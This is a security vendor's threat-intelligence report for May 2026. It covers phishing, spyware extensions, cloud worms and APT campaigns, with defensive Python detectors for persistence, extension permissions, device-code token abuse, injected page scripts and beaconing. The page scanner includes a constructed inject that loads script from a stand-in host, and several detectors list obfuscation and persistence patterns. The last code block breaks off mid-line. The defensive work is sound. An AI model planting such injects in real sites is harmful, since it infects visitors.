Securonix Threat Labs Monthly Intelligence Insights – May 2026

June 16, 2026

Authors: Dheeraj Kumar

 

Introduction

The Monthly Intelligence Insights report provides a summary of top threats curated, monitored, and analyzed by Securonix Threat Labs in May 2026. The report also includes a synopsis of the threats, indicators of compromise (IoCs), tactics, techniques, and procedures (TTPs), and related tags. Each threat has a comprehensive summary from Threat Labs and search queries from the Threat Research team. For additional information on Threat Labs and the related search queries used via Autonomous Threat Sweeper to detect the threats mentioned below, refer to our Threat Labs home page.

Last month, Securonix Autonomous Threat Sweeper identified and analyzed 4,188 TTPs and IoCs; identified 113 emerging threats; investigated 81 potential threats; and elevated 19 incidents. The top data sources swept against include IDS / IPS / UTM / Threat Detection, Data Loss Prevention, Endpoint Management Systems, and Email / Email Security. 

 

Executive Summary

  • TAX#TRIDENT: Fake Indian tax assessment lures now support multiple execution paths: archive-to-installer, decoy-driven VBScript delivery, and PHP-looking endpoints returning script content for silent endpoint-management enrollment. 

  • VENOMOUS#HELPER: SSA-themed phishing installs signed remote-access tooling with service persistence, SafeBoot registry survival, self-healing, operator-presence polling, and redundant access channels. 

  • AI browser extension spyware: AI productivity extensions are being used as a privileged browser foothold to read email content, prompts, API keys, form data, browsing sessions, and search activity. 

  • Device code phishing: Identity takeover is shifting toward legitimate device authorization flows, dynamic code generation, QR/PDF lures, and phishing-as-a-service offerings that make token theft easier to scale. 

  • Compromised websites and ClickFix: DriveSurge-style infrastructure uses legitimate websites and traffic distribution systems to push fake browser updates or copy-paste command instructions to unsuspecting visitors. 

  • Cloud credential worming: PCPJack-style tooling harvests cloud, container, developer, and application secrets while propagating through exposed control planes and vulnerable web services. 

  • Modular espionage malware: Kazuar has evolved into a leader-coordinated ecosystem designed to keep most infected hosts silent while one elected node performs external communications. 

  • APT tradecraft: Nimbus Manticore and Webworm show parallel movement toward trusted execution flows, public-service C2, proxy chaining, SEO poisoning, and AI-assisted malware development. 

 

Threat Overview

 

Securonix Threat Research Highlights (Originally published in May 2026)

 

TAX#TRIDENT: Fake Tax Lures Expand Across Script, Archive, and Management-Agent Delivery

Securonix Threat Research tracks TAX#TRIDENT as an active fake Indian income-tax campaign that pivots across multiple delivery paths. The lure remains consistent - a tax assessment or penalty notice - but the route to execution changes across archive downloads, VBScript downloaders, and PHP-looking endpoints that actually return script content. 

Two branches converge on the same signed ClientSetup payload. After execution, the installer creates a hidden client tree, writes runtime configuration, installs service and driver persistence, launches a fake system-named client process from a non-standard directory, and starts long-lived outbound communications. A third branch changes the final payload by silently enrolling an endpoint-management agent after several script and cloud-hosted stages. 

Analyst Commentary: This campaign is notable because it reuses a believable tax lure while varying the delivery chain and final tooling, which makes narrow indicator-based detection fragile. It matters because both the ClientSetup and UEMS branches can provide durable remote access under the cover of signed or enterprise-looking software. The most likely near-term evolution is additional lure domains, wrapper changes, and alternate staging paths that preserve the same endpoint control objective. This assessment would be strengthened by repeat observations of the same behavioral cluster across new infrastructure and weakened if future samples show isolated commodity misuse rather than coordinated reuse. 

Why It Matters: The campaign shows how a single lure theme can survive defensive blocking by changing wrappers, file names, staging hosts, and final payloads. Hash-only detection is brittle. The stronger approach is to detect the behavior chain: tax-themed access, script execution from user-writable folders, misleading file extensions, YTSysConfig creation, unexpected service/driver installation, and long-lived outbound sessions to uncommon ports. 

 

VENOMOUS#HELPER: Dual-RMM Phishing for Silent Remote Access

Securonix Threat Research analyzed VENOMOUS#HELPER as an SSA-themed phishing campaign that delivers signed remote-access tooling rather than obvious custom malware. The attack begins with a statement-themed lure, validates the victim through an email-harvesting page, and then pushes a packaged remote-access executable disguised as a government document. 

After the victim approves the initial prompt, the chain installs silently as an OS service. It establishes persistence through service registration, SafeBoot network registry entries, a self-healing watchdog, and redundant remote-access channels. Dynamic analysis also showed automated surveillance loops that run even without hands-on-keyboard activity. 

Analyst Commentary: This activity reflects a disciplined initial access operation designed to blend into legitimate administration workflows rather than rely on traditional malware. It matters because trusted remote management software can bypass signature-based controls while giving operators persistent and interactive access with limited user visibility. The most likely next step is selective hands-on-keyboard activity when the victim appears idle, potentially followed by deeper discovery, credential abuse, or deployment of additional tooling. This assessment would be strengthened by evidence of post-access operator commands or lateral movement and weakened if access remained limited to automated surveillance with no follow-on intrusion. 

Why It Matters: This campaign illustrates a central challenge in modern intrusion detection: when the malware is a legitimate remote management tool, the only reliable evidence is behavior. Service creation from non-standard paths, SafeBoot persistence, repeated polling loops, hidden remote sessions, and renamed native binaries are more useful than static file reputation. 
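As an added detection example (not code from either campaign's analysis), the following Python flags the two persistence behaviors described in the TAX#TRIDENT and VENOMOUS#HELPER sections: a service whose binary runs from a user-writable path or carries a Windows-native name outside System32, and a SafeBoot\Network registry write. The event shape, the path list, and the native-name set are assumptions made for the example; the events are constructed.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Hypothetical flattened event shape; the field names are assumptions made for
# this example, not a real SIEM schema.
@dataclass
class Event:
    host: str
    kind: str    # "service_install" or "registry_set"
    name: str    # service name, or full registry key path
    detail: str  # service ImagePath, or registry value name

# Locations from which a legitimately installed service binary should never run.
USER_WRITABLE = [
    re.compile(r"^[a-z]:\\users\\[^\\]+\\downloads\\", re.I),
    re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\", re.I),
    re.compile(r"^[a-z]:\\users\\public\\", re.I),
    re.compile(r"^[a-z]:\\windows\\temp\\", re.I),
]
# Windows-native binary names that only belong under \Windows\System32
# (a short illustrative set, not an exhaustive list).
NATIVE_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "wmic.exe"}
SAFEBOOT_RE = re.compile(
    r"\\(currentcontrolset|controlset\d+)\\control\\safeboot\\(minimal|network)\\", re.I)

def image_from_path(image_path: str) -> str:
    """Strip quoting and arguments from a service ImagePath value."""
    s = image_path.strip()
    if s.startswith('"'):
        return s[1:s.find('"', 1)]
    return s.split(" ", 1)[0]

def findings_for(ev: Event) -> list[str]:
    out: list[str] = []
    if ev.kind == "service_install":
        exe = image_from_path(ev.detail)
        if any(p.search(exe) for p in USER_WRITABLE):
            out.append(f"service '{ev.name}' installed from user-writable path: {exe}")
        base = exe.rsplit("\\", 1)[-1].lower()
        if base in NATIVE_NAMES and not exe.lower().startswith("c:\\windows\\system32\\"):
            out.append(f"service '{ev.name}' runs native-named binary outside System32: {exe}")
    elif ev.kind == "registry_set" and SAFEBOOT_RE.search(ev.name):
        out.append(f"SafeBoot persistence entry written: {ev.name}")
    return out

def triage(events: list[Event]) -> dict[str, list[str]]:
    """Group findings per host so a service install and a SafeBoot write on the
    same machine surface together as one persistence story."""
    by_host: dict[str, list[str]] = {}
    for ev in events:
        hits = findings_for(ev)
        if hits:
            by_host.setdefault(ev.host, []).extend(hits)
    return by_host

# Constructed sample events (not telemetry from either campaign).
SAMPLE = [
    Event("ws01", "service_install", "Spooler", r"C:\Windows\System32\spoolsv.exe"),
    Event("ws01", "service_install", "StatementViewer",
          r'"C:\Users\jdoe\Downloads\SSA_Statement\viewer.exe" -service'),
    Event("ws01", "registry_set",
          r"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\StatementViewer", "(Default)"),
    Event("ws02", "service_install", "ClientSvc", r"C:\ProgramData\Client\svchost.exe"),
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE).items():
        print(host)
        for hit in hits:
            print("  -", hit)
```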

 

Spyware Threat Developments (Originally published in May 2026)

 

High-Risk AI Browser Extensions

The spyware section highlights a growing risk: AI-branded browser extensions that market productivity features while gaining privileged access to email, AI prompts, browsing sessions, search behavior, and API keys. The analyzed set included 18 high-risk extensions spanning remote control, adversary-in-the-browser behavior, infostealing, search hijacking, brand impersonation, and spyware. 

These extensions do not need kernel-level malware to become dangerous. Browser permissions can allow content-script execution on all pages, decrypted page-content access through DOM observation, request interception before encryption, extension-scoped proxy routing, cookie access, and persistent identifiers that restore themselves after deletion. 

Analyst Commentary: This activity reflects a meaningful shift from conventional browser nuisanceware toward higher-impact collection and control inside trusted user workflows. It matters because the browser now holds prompts, email content, authentication state, and business context that can be captured without requiring traditional malware execution paths. The near-term watchpoint is continued abuse of GenAI branding and features to justify excessive permissions and to increase adoption at scale. This assessment would be strengthened by evidence of broader enterprise targeting or active post-compromise abuse, and weakened if additional review shows these cases were limited to isolated policy violations without sustained malicious operation. 

Why It Matters: AI prompts and assistant workflows frequently contain proprietary code, business plans, unreleased content, personal data, and credentials. A malicious extension sitting inside the browser can see that content before network security controls do. This creates an enterprise data exposure path that traditional endpoint and email controls may not fully cover. 
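The permission combinations described above can be checked directly from an extension's manifest.json before it is allowlisted. This added example (not code from the analysis above) scores a Chromium-style manifest; the permission weights and verdict thresholds are illustrative choices for this example, and the three manifests are constructed.

```python
from __future__ import annotations
import json

# Chromium extension permission names and why each matters for the spyware
# pattern above; the weights are illustrative thresholds chosen for this example.
RISKY = {
    "debugger":        (3, "DevTools-level control of every tab: read and rewrite page content and scripts"),
    "proxy":           (3, "can route all browser traffic through third-party infrastructure"),
    "webRequest":      (2, "sees requests before encryption, including headers"),
    "cookies":         (2, "reads session cookies for hosts it has host access to"),
    "nativeMessaging": (2, "can talk to a native helper outside the browser sandbox"),
    "scripting":       (1, "can inject scripts into pages it has host access to"),
    "tabs":            (1, "URL and title of every open tab"),
}
ALL_PAGE_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

def all_page_access(m: dict) -> bool:
    """True when the manifest can run or reach content on every site."""
    hosts = set(m.get("host_permissions", [])) | set(m.get("optional_host_permissions", []))
    for cs in m.get("content_scripts", []):
        hosts |= set(cs.get("matches", []))
    # Manifest V2 listed host patterns under "permissions"; handle both forms.
    hosts |= {p for p in m.get("permissions", []) if "://" in p or p == "<all_urls>"}
    return bool(hosts & ALL_PAGE_PATTERNS)

def assess(manifest_json: str) -> dict:
    m = json.loads(manifest_json)
    perms = set(m.get("permissions", [])) | set(m.get("optional_permissions", []))
    findings = [f"{p}: {RISKY[p][1]}" for p in sorted(perms & RISKY.keys())]
    score = sum(RISKY[p][0] for p in perms & RISKY.keys())
    broad = all_page_access(m)
    if broad:
        findings.append("host access to all pages")
        score += 2
    # Combinations that make up the adversary-in-the-browser pattern.
    if broad and ("scripting" in perms or m.get("content_scripts")):
        findings.append("content scripts on every page: DOM observation of decrypted content")
        score += 2
    if broad and "webRequest" in perms:
        findings.append("request interception on every page")
        score += 2
    verdict = "block" if score >= 6 else "review" if score >= 3 else "allow"
    return {"name": m.get("name"), "version": m.get("version"),
            "score": score, "verdict": verdict, "findings": findings}

# Constructed manifests (not real extensions).
BENIGN = json.dumps({"manifest_version": 3, "name": "Tab Counter", "version": "1.0",
                     "permissions": ["tabs"]})
REVIEW = json.dumps({"manifest_version": 3, "name": "Grammar Buddy", "version": "2.1",
                     "permissions": ["scripting", "storage"],
                     "content_scripts": [{"matches": ["<all_urls>"], "js": ["check.js"]}]})
SPYWARE = json.dumps({"manifest_version": 3, "name": "AI Writing Helper", "version": "4.2.0",
                      "permissions": ["scripting", "cookies", "webRequest", "storage", "proxy"],
                      "host_permissions": ["<all_urls>"],
                      "content_scripts": [{"matches": ["<all_urls>"], "js": ["helper.js"]}]})

if __name__ == "__main__":
    for manifest in (BENIGN, REVIEW, SPYWARE):
        r = assess(manifest)
        print(f"{r['name']} {r['version']}: {r['verdict']} (score {r['score']})")
        for f in r["findings"]:
            print("  -", f)
```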

 

Phishing and Social Engineering Trends (Originally published in May 2026)

 

Device Code Phishing: Identity Takeover Through Legitimate Authentication Flows

Device code phishing has moved from a niche technique to a rapidly expanding identity-takeover model. Attackers abuse the OAuth 2.0 device authorization grant by convincing users to copy a generated code into a legitimate device-login page. Once entered, the attacker receives tokens that can grant access to enterprise accounts and connected services. 

The key improvement in current campaigns is on-demand code generation. Older attacks suffered from short code-expiration windows. Newer kits generate the code only when the target clicks the lure, which makes the attack viable even if the user opens the message hours later. Delivery now includes URLs, QR codes, PDF attachments, compromised sender accounts, and document-themed landing pages. 

Analyst Commentary: This activity reflects a practical evolution in identity takeover rather than a niche tactic, because it blends trusted authentication workflows with scalable social engineering and token theft. It matters because it can enable account compromise, fraud, business email compromise, data exposure, and downstream intrusion even when users are trained to avoid traditional credential phishing. The near-term watchpoint is broader adoption by existing phishing operators and continued reuse of similar kits, themes, and cloud-hosted delivery chains. The assessment would be strengthened by additional victimology and confirmed post-compromise outcomes, and weakened if adoption proves limited to a small set of low-volume operators. 

Why It Matters: Device code phishing turns user trust in legitimate authentication flows against the organization. Phishing-resistant authentication helps, but it must be paired with policy controls that limit device-code flows, restrict consent, and detect unusual token grants. Users may believe they are completing a normal sign-in prompt because the final code entry occurs on a real identity portal. 
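The "detect unusual token grants" point above can be turned into a correlation rule: a device-code sign-in followed, within a short window, by token use from a different address, a new application consent, or a mailbox rule. This added example (not code from the original post) does that over constructed sign-in events; the event schema, the 60-minute window, and the allowlist of identities expected to use the device code flow are assumptions.

```python
from __future__ import annotations
from dataclasses import dataclass
from datetime import datetime, timedelta

# Hypothetical normalized sign-in/audit event; field names are assumptions for
# this example, not a specific identity provider's schema.
@dataclass
class Event:
    ts: datetime
    user: str
    kind: str            # "signin", "token_use", "consent", "mailbox_rule"
    ip: str
    user_agent: str = ""
    protocol: str = ""   # for "signin": "deviceCode", "browser", ...
    app: str = ""        # for "consent": the application granted access

WINDOW = timedelta(minutes=60)
# Identities that legitimately use the device code flow (assumed allowlist).
EXPECTED_DEVICE_CODE_USERS = {"conf-room-01@example.com"}

def device_code_alerts(events: list[Event]) -> list[dict]:
    """Pair each device-code sign-in with the follow-on events the post lists:
    token use from elsewhere, new app consent, and mailbox rule creation."""
    events = sorted(events, key=lambda e: e.ts)
    alerts = []
    for i, e in enumerate(events):
        if not (e.kind == "signin" and e.protocol == "deviceCode"):
            continue
        reasons = []
        for f in events[i + 1:]:
            if f.ts - e.ts > WINDOW:
                break  # events are sorted, so nothing later is inside the window
            if f.user != e.user:
                continue
            if f.kind == "token_use" and f.ip != e.ip:
                reasons.append(f"token used from {f.ip} ({f.user_agent}); code entered from {e.ip}")
            elif f.kind == "consent":
                reasons.append(f"new app consent granted to {f.app}")
            elif f.kind == "mailbox_rule":
                reasons.append("mailbox rule created shortly after authentication")
        # A device-code sign-in with no follow-on is still worth a low-severity
        # alert unless the identity is expected to use that flow.
        if not reasons and e.user in EXPECTED_DEVICE_CODE_USERS:
            continue
        severity = "high" if len(reasons) >= 2 else "medium" if reasons else "low"
        alerts.append({"user": e.user, "at": e.ts.isoformat(),
                       "severity": severity, "reasons": reasons})
    return alerts

T = datetime(2026, 5, 12, 9, 0)
# Constructed events using documentation IP ranges (not real victims or infrastructure).
SAMPLE = [
    Event(T, "alice@example.com", "signin", "203.0.113.10", "Mozilla/5.0 (Windows NT 10.0)", "deviceCode"),
    Event(T + timedelta(minutes=1), "alice@example.com", "token_use", "198.51.100.77", "python-requests/2.31"),
    Event(T + timedelta(minutes=4), "alice@example.com", "mailbox_rule", "198.51.100.77"),
    Event(T + timedelta(minutes=30), "bob@example.com", "signin", "203.0.113.22", "Mozilla/5.0", "browser"),
    Event(T + timedelta(hours=2), "conf-room-01@example.com", "signin", "203.0.113.5", "TeamsDevice", "deviceCode"),
    Event(T + timedelta(hours=3), "alice@example.com", "token_use", "203.0.113.10", "Mozilla/5.0 (Windows NT 10.0)"),
]

if __name__ == "__main__":
    for a in device_code_alerts(SAMPLE):
        print(a["severity"].upper(), a["user"], a["at"])
        for r in a["reasons"]:
            print("  -", r)
```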

 

DriveSurge: Compromised Websites, ClickFix, and Fake Updates at Scale

DriveSurge is a threat actor operating as a large-scale initial access and malware delivery service that compromises legitimate websites and silently redirects visitors through a traffic distribution system to fake browser update pages or ClickFix lures. The activity has been tied to thousands of compromised sites and uses layered infrastructure, obfuscated JavaScript injects, failover delivery paths, and victim profiling to deliver malware at scale. The operation has used the same zTDS-based approach since at least 2025, with public reporting identifying active clustering and infrastructure expansion in recent months. 

The main risk is that ordinary visits to trusted websites can become an infection path, enabling downstream actors to gain initial access through highly believable social engineering and staged payload delivery. Immediate priorities are to hunt for unauthorized external script loads, clipboard hijacking behaviors, suspicious browser update prompts, and PowerShell or Terminal execution patterns tied to fake remediation steps, while strengthening website integrity monitoring and endpoint controls against multi-stage malware delivery. 

Analyst Commentary: This activity matters because it industrializes initial access by combining compromised trusted websites, traffic shaping, and adaptable social engineering into a scalable delivery pipeline. The strongest assessment is that the actor is enabling downstream compromise rather than pursuing a single end goal, which increases exposure across many victim types at once. A key watchpoint is whether the infrastructure expands further into new lure formats, additional operating systems, or more pre-positioned domains before activation. This assessment would be strengthened by more observed victim follow-on intrusions and weakened if future activity shows the infrastructure is fragmented across unrelated operators. 

Why It Matters: This activity combines web compromise, social engineering, and payload distribution into a scalable access pipeline. The most important detection point may be the compromised website itself: external JavaScript loaded from unrelated infrastructure, encoded redirect snippets, and unusual update prompts are early indicators before endpoint infection occurs. 
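The website-side detection point above (external JavaScript from unrelated infrastructure and encoded redirect snippets) can be checked in a site integrity sweep. This added example (not code from the original reporting) scans a page's script tags with Python's standard-library HTML parser; the third-party allowlist, the marker list, and the sample page are constructed for the example.

```python
from __future__ import annotations
from html.parser import HTMLParser
from urllib.parse import urlparse

# Third-party script hosts the site is known to use (assumed allowlist).
ALLOWED_HOSTS = {"www.googletagmanager.com"}
# Markers typical of encoded redirect or loader snippets injected into pages.
OBFUSCATION_MARKERS = ("atob(", "String.fromCharCode", "unescape(", "eval(", "document.write(")

class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""
    def __init__(self) -> None:
        super().__init__()
        self.external: list[str] = []
        self.inline: list[str] = []
        self._in_script = False
        self._buf: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))

def host_of(src: str, site_host: str) -> str:
    """Resolve a script src to a hostname; relative paths belong to the site."""
    if src.startswith("//"):
        src = "https:" + src
    return (urlparse(src).hostname or site_host).lower()

def scan_page(html: str, site_host: str) -> list[str]:
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        host = host_of(src, site_host)
        same_site = host == site_host or host.endswith("." + site_host)
        if not same_site and host not in ALLOWED_HOSTS:
            findings.append(f"external script from unrelated host {host}: {src}")
    for body in p.inline:
        markers = [m for m in OBFUSCATION_MARKERS if m in body]
        # Encoding alone is common; encoding plus a redirect or dynamic loader is not.
        if markers and ("location" in body or "createElement" in body):
            findings.append(f"inline script with encoded redirect/loader markers {markers}")
    return findings

# Constructed page: two legitimate scripts, one injected external loader, and an
# inline snippet that decodes a string and pulls a second script from elsewhere.
SAMPLE_HTML = """<html><head>
<script src="/js/app.js"></script>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-TEST"></script>
<script src="//static.tracking-update.test/lib.js"></script>
<script>eval(atob("dmFyIHg9MQ=="));var s=document.createElement("script");
s.src="//static.tracking-update.test/load.js";document.head.appendChild(s);</script>
</head><body>...</body></html>"""

if __name__ == "__main__":
    for f in scan_page(SAMPLE_HTML, "example-site.test"):
        print("-", f)
```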

 

Emerging Malware Families and Backdoor Operations (Originally published in May 2026)

 

PCPJack: Cloud Worming and Credential Theft at Scale

PCPJack is a credential theft framework built for exposed cloud and web infrastructure. It begins with a Linux shell bootstrapper that sets up a working directory, checks the host against an operator blocklist, removes rival artifacts, installs runtime dependencies, downloads Python modules, establishes persistence, and launches the orchestrator. 

The toolset focuses on credential theft and propagation rather than cryptocurrency mining. It steals environment files, config files, API keys, database credentials, SMTP secrets, SSH keys, service account tokens, secret-store data, and wallet files. It then attempts to spread through exposed management APIs, container control planes, in-memory data stores, document databases, ML cluster endpoints, and vulnerable web applications. 

Analyst Commentary: This activity is notable because it combines credential theft, internal propagation, and explicit removal of rival actor artifacts, which suggests a focused and operationally mature cloud intrusion set rather than opportunistic abuse alone. It matters because exposed cloud administration paths and weak secret handling can turn a single foothold into broad access across workloads, containers, and connected services. The most likely near-term development is continued expansion against exposed management surfaces and vulnerable web applications, especially where credential hygiene and service authentication remain weak. This assessment would be strengthened by additional victimology or confirmed post-compromise outcomes, and weakened by evidence that the tooling was limited to isolated testing or short-lived staging. 

Why It Matters: Cloud-focused malware does not need a miner to be monetizable. Secrets, API keys, SSH keys, service tokens, and application credentials are often more valuable because they can enable spam, fraud, extortion, resale, and downstream intrusion. The worm also shows why exposed management APIs and over-privileged service accounts are high-risk even when no sensitive application data is stored locally. 

 

Kazuar: From Backdoor to Modular Espionage Ecosystem 

Kazuar has evolved from a traditional backdoor into a modular, leader-coordinated espionage framework. Its architecture uses Kernel, Bridge, and Worker modules. The Kernel coordinates tasking, configuration, logging, and module interaction. The Bridge handles external C2. Worker modules perform operational tasks such as collection, keylogging, screenshots, recent document discovery, and reconnaissance. 

The most important architectural change is leadership election. Only one Kernel instance in an infected environment becomes the active leader and communicates externally. Other instances enter SILENT mode and coordinate internally through encrypted IPC. This sharply reduces visible outbound traffic while maintaining internal task distribution and resilience. 

Analyst Commentary: This activity reflects a mature espionage capability built for persistence, resilience, and low visibility rather than rapid disruption. It matters because the architecture can fragment telemetry across hosts and processes, increasing the chance that defenders dismiss related signals as isolated noise. A key watchpoint is whether similar leader-based coordination and fallback communications appear in related intrusions against public sector and defense entities. The assessment would be strengthened by confirmed victimology breadth and observed operational deployment data, and weakened if these capabilities remain largely limited to laboratory or research visibility. 

Why It Matters: Kazuar demonstrates why single-sample malware detection is insufficient for state-grade tooling. The observable footprint is distributed across processes, IPC channels, filesystem staging, and intermittent egress. Defenders need correlation logic that can link low-confidence signals into an ecosystem-level detection. 

 

Nation-State and APT Activity (Originally published in May 2026)

 

Nimbus Manticore: Rapid Adaptation During Geopolitical Conflict 

Nimbus Manticore, an IRGC-affiliated threat actor also tracked as UNC1549, conducted a multi-wave campaign targeting organizations in the aviation and software sectors across the United States, Europe, and the Middle East during the recent Iranian conflict and its aftermath. The operation used career-themed lures, a trojanized Zoom installer, and a fake SQL Developer download site promoted through SEO poisoning, while abusing AppDomain hijacking, trusted signed components, scheduled task hijacking, and a new MiniFast backdoor to gain execution, persistence, and remote control. 

This activity shows a more adaptable and mature intrusion capability that can support espionage, data theft, and sustained access into strategically relevant organizations. Immediate priorities are to hunt for suspicious .NET application configuration changes, validate software download sources, review scheduled task modifications tied to legitimate installers, and monitor for unauthorized command execution, file transfer, and persistence behavior associated with staged loader chains. 

Analyst Commentary: This campaign reflects a meaningful step forward in operational flexibility, with Nimbus Manticore combining social engineering, stealthy execution paths, and broader victim acquisition methods to improve access opportunities against priority sectors. The use of a newer backdoor and search-driven delivery increases the likelihood of both targeted and opportunistic compromise, which matters because it expands exposure beyond traditional phishing recipients. The key watchpoint is whether the actor continues scaling SEO poisoning and signed component abuse into additional sectors or regions. Evidence of repeatable follow-on post-compromise actions, wider sector coverage, or more standardized persistence tradecraft would strengthen this assessment, while isolated infections or limited command diversity would weaken it. 

Why It Matters: The actor is not relying on one delivery model. It shifts from phishing archives to installer abuse to search-driven fake downloads, while also improving backdoor development speed. Detection should focus on the execution chain: .config hijacking, user-profile update directories, scheduled task modification, suspicious DLL loads, and structured API tasking endpoints. 

 

Webworm: Proxy-Centric Espionage and Public-Service C2 

Webworm is a China-aligned threat group active since at least 2022 that has shifted from earlier Asia-focused operations toward European government targets and at least one university in South Africa, while expanding its toolkit with stealthier backdoors and proxy infrastructure. Recent activity featured EchoCreep and GraphWorm for command and control over Discord and Microsoft Graph API, GitHub for malware staging, cloud storage abuse for configuration retrieval and exfiltration, and web application reconnaissance using directory and vulnerability scanning consistent with opportunistic intrusion development. 

The main implication is that affected organizations may face covert persistence, credential access, internal routing abuse, and staged data theft through trusted cloud services that can blend with normal traffic. Immediate priorities are to investigate for unauthorized use of Microsoft Graph and Discord-related traffic patterns, review webmail and internet-facing systems for exploitation paths including CVE-2017-7692, validate persistence points and scheduled tasks, and hunt for unapproved tunneling or proxy behavior across endpoints and network egress. 

Analyst Commentary: This activity reflects a maturing intrusion set built for stealth, flexibility, and sustained access rather than simple single-host control. The abuse of common cloud and collaboration services for command and control and exfiltration raises the risk of delayed detection, especially where outbound web traffic is broadly trusted. A key watchpoint is whether the actor expands this model to additional cloud services or increases reliance on chained proxy infrastructure for deeper internal access. The assessment would be strengthened by corroborated victim-side evidence of initial access and lateral movement, and weakened if the observed tooling proves limited to a narrow subset of operations. 

Why It Matters: Webworm represents a broader espionage trend: operators reduce the visibility of custom C2 by hiding command traffic inside public APIs and by routing access through layered proxy networks. Blocking known malware hashes is not enough when the suspicious behavior is an unusual executable talking to a normally allowed cloud or collaboration API. 

 

Securonix Threat Labs Summary

Based on the threats observed during May 2026, Securonix Threat Labs recommends implementing the following defensive measures to strengthen security posture and mitigate potential risks. 

Identity and Access 

  • Block device code flow where possible. Use conditional access or equivalent identity policy controls to block device authorization grants for users and applications that do not explicitly require them. 

  • Restrict app consent. Disable user-driven consent for high-risk scopes and require administrator approval for new OAuth applications. 

  • Hunt token anomalies. Correlate device-code events, new app grants, impossible travel, new user agents, and mailbox rule creation after authentication. 

  • Revoke before reset. For suspected device-code compromise, revoke refresh tokens and app grants in addition to resetting passwords. 

Endpoint and Remote Access 

  • Inventory approved remote access tools. Create an allowlist of sanctioned remote-support and administration tools, expected install paths, service names, owners, and egress destinations. 

  • Detect service creation from user paths. Alert when services are created by executables launched from Downloads, temporary folders, Public Documents, or archive-extraction paths. 

  • Monitor SafeBoot and recovery persistence. Treat new SafeBoot\Network entries, self-healing watchdogs, and recovery service changes as high-priority persistence events. 

  • Hunt renamed native binaries. Detect copied or renamed system utilities such as wmic.exe.bak and download tools renamed with DLL-like names in user-writable directories. 

  • Block unmanaged script chains. Restrict wscript.exe, cscript.exe, mshta-like execution, and native shell download commands from email, browser, and archive contexts. 

Browser and AI Governance 

  • Move to extension allowlisting. Permit only approved extensions by ID and version. Block all-page access, debugger-like permissions, proxy changes, and request interception unless explicitly justified. 

  • Inspect extension data flows. Log extension network destinations, long-lived WebSocket sessions, proxy configuration changes, and search-provider overrides. 

  • Protect prompts and API keys. Treat AI prompts, model API keys, and assistant integrations as sensitive data. Add DLP coverage and vault API keys outside browser storage where feasible. 

  • Train on browser-update and ClickFix lures. Users should not download browser updates from random sites or paste webpage-provided commands into terminals. 

Cloud and Workload Security 

  • Close exposed management APIs. Remove internet exposure from container daemons, orchestration APIs, data stores, ML job APIs, and web admin panels unless explicitly required and authenticated. 

  • Enforce instance metadata protections. Require hardened metadata access controls and least-privilege service accounts for workloads. 

  • Rotate secrets after exposure. If credential theft is suspected, rotate API keys, SSH keys, service tokens, database passwords, and messaging credentials. Do not rely only on host cleanup. 

  • Baseline public object storage and repository access. Alert on unusual endpoint processes retrieving tools, configuration files, or archives from public storage and repositories. 

Detection Engineering and Response 

  • Prioritize process lineage. Correlate parent/child relationships from email clients, browsers, archives, scripting engines, service managers, and remote-access binaries. 

  • Correlate endpoint, identity, browser, and cloud events. Many of this month’s campaigns move across those boundaries. Single-source alerts will miss the full chain. 

  • Build periodic-behavior analytics. Near-fixed polling loops, long-lived C2 sessions, and repeated security posture checks are strong signals for remote access implants. 

  • Validate complete containment. For dual-channel or modular intrusions, verify that all services, registry entries, scheduled tasks, browser extensions, tokens, cloud keys, and redundant C2 paths are removed. 
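The "periodic-behavior analytics" recommendation above (near-fixed polling loops and long-lived C2 sessions, as seen in the VENOMOUS#HELPER operator-presence polling) can be implemented as a timing check over outbound connection records. This added example (not Securonix content) groups connections by host, destination, and port and reports groups whose inter-connection interval has low jitter; the record shape, the minimum count, the jitter threshold, and the connection log are assumptions constructed for the example.

```python
from __future__ import annotations
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median

def periodicity(intervals: list[float]) -> tuple[float, float]:
    """Median inter-connection interval and a jitter ratio (median absolute
    deviation divided by the median). Near-fixed loops have a ratio near 0."""
    med = median(intervals)
    mad = median(abs(x - med) for x in intervals)
    return med, (mad / med if med else float("inf"))

def find_beacons(conns: list[tuple[str, str, int, datetime]],
                 min_count: int = 8, max_jitter: float = 0.1) -> list[dict]:
    """Group outbound connections by (host, destination, port) and report the
    groups whose timing is regular enough to look like a polling loop."""
    by_key: dict[tuple[str, str, int], list[datetime]] = defaultdict(list)
    for host, dst, port, ts in conns:
        by_key[(host, dst, port)].append(ts)
    hits = []
    for (host, dst, port), stamps in by_key.items():
        if len(stamps) < min_count:
            continue  # too few observations to call the timing regular
        stamps.sort()
        intervals = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        period, jitter = periodicity(intervals)
        if jitter <= max_jitter:
            hits.append({"host": host, "dst": dst, "port": port, "count": len(stamps),
                         "period_s": period, "jitter": round(jitter, 3)})
    return hits

T0 = datetime(2026, 5, 20, 8, 0)
# Constructed connection log (host, destination, port, time) using documentation
# IP ranges: one implant-style loop on an uncommon port, one irregular web
# session, and one short series that is too brief to judge.
BEACON_OFFSETS = [0, 61, 120, 179, 241, 300, 362, 419, 480, 541, 600, 659]
BROWSING_OFFSETS = [0, 5, 7, 40, 300, 301, 900, 1500, 1502, 2000]
SAMPLE = (
    [("ws01", "198.51.100.42", 7443, T0 + timedelta(seconds=s)) for s in BEACON_OFFSETS]
    + [("ws01", "203.0.113.8", 443, T0 + timedelta(seconds=s)) for s in BROWSING_OFFSETS]
    + [("ws02", "203.0.113.9", 443, T0 + timedelta(seconds=s)) for s in (0, 30, 60)]
)

if __name__ == "__main__":
    for h in find_beacons(SAMPLE):
        print(f"{h['host']} -> {h['dst']}:{h['port']} every ~{h['period_s']:.0f}s "
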